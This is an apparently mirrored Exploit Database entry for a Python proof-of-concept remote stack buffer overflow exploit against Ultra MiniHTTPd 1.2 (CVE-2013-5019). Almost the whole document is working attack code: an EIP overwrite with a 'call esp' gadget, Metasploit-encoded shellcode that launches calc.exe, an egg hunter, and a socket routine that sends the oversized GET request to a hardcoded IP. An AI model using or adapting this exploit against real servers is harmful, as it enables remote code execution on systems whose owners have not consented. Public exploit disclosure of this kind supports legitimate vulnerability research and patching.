Ultra MiniHTTPd 1.2 – ‘GET’ Remote Stack Buffer Overflow (PoC)

• Exploit Database
• 37 阅读

• 作者： jollymongrel
  日期： 2018-04-17
• 类别：

  • local
  平台：

  • windows_x86
• 来源：https://www.exploit-db.com/exploits/44472/

• # Exploit Title: Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow
  # Date: 2018-04-14
  # Exploit Author: jollymongrel
  # Vendor Homepage: http://www.vector.co.jp
  # Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
  # Version: 1.2
  # Tested on: Windows 7 32-bit
  # CVE : CVE-2013-5019
  
  import sys
  import socket
  import struct
  
  eip = struct.pack('I', 0x764046cd) #call esp [msvcrt.dll]
  
  #windows/exec - 274 bytes
  #http://www.metasploit.com
  #Encoder: x86/shikata_ga_nai
  #EXITFUNC=thread
  #CMD=calc.exe
  #badchars='\x00\x09\x0a\x0b\x0c\x0d\x20\x2f\x3f'
  shellcode = ("no0bno0b"+"\xb8\x21\xa0\xa2\xbd\xdb\xd1\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
  "\x3e\x31\x43\x15\x83\xc3\x04\x03\x43\x11\xe2\xd4\x1a\x51\xd8"
  "\x25\xbd\x4c\xf4\x90\x35\x55\x0f\x79\x9f\x5c\x5e\x45\x5c\xb5"
  "\x5d\x84\x31\x44\x9d\x46\xde\x89\xb2\x1a\x92\xe6\x1d\x26\x1d"
  "\xa1\xb0\xfa\x6c\x5a\x1e\xf7\xb7\xb6\xfb\x71\xbf\x2a\x51\xb6"
  "\x2a\x53\x27\x2a\x43\x49\x67\xe7\x66\x6a\x6e\xe3\x10\x46\x27"
  "\xe5\x1f\xc5\xb5\xad\x32\x57\x38\xd3\x66\xa8\xa7\xf8\xe0\xfc"
  "\x1a\x33\xce\x22\xf0\xad\x34\xff\x3a\x42\x91\x07\x6d\xe5\xf1"
  "\x79\x73\xa3\xe9\xbf\xd7\xbf\xa7\x10\x06\xf2\x2c\x81\x6a\xa0"
  "\x97\x46\xae\xe7\x33\x1c\x87\x02\x5d\x8d\xd7\x5a\xbe\x7c\xa9"
  "\x96\x7f\x04\xbd\xe4\xb5\xbc\xa0\xf5\xf3\x12\x66\x6c\xbc\xb7"
  "\xb2\x49\x01\x66\xd3\x8f\x40\x5b\x33\x07\x22\x30\x0e\x11\xc6"
  "\x89\xfa\xbc\x18\x0f\x33\x18\xb1\x01\xe0\x53\x4a\x23\xab\x77"
  "\x17\x7f\xf8\x4f\xdd\x01\x79\x04\xa6\x82\xe0\xc4\x33\x06\x12"
  "\x36\x43\x2d\xc6\x8a\xfb\x24\x67\x4a\xc6\x5a\x4a\x4c\x97\x4c"
  "\x1b\x68\x98\xf8\x45\x2d\x86\x43\xbe\x0e\x96\x8f\xca\x89\x7e"
  "\x5b\xe1\x8b\xb2\x5f\xd0\x94\xdf\x5e\x7c\x0e\x25\xa5\xf7\xea"
  "\x9d\x1b\xa9\x58\x50\x3a\xb8\x77\x16\xb1\x87\x48\x94\x37\x87"
  "\x9a\x9d\xe2\xd0")
  
  #egg hunter to search for no0bno0b
  egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
  "\xef\xb8\x6e\x6f\x30\x62\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
  
  payload = "A" * 537
  payload += shellcode
  payload += "A" * (967 - len(payload))
  payload += eip
  payload += egghunter
  payload += "\xff\xe7" #jmp edi
  payload += "C" * (1007 - len(payload))
  
  print "[+] sending payload, length", len(payload)
  
  buf = "GET /"+payload+"HTTP/1.1\r\n\r\n"
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect(("192.168.32.175", 80))
  s.send(buf)
  data = s.recv(1024)
  s.close()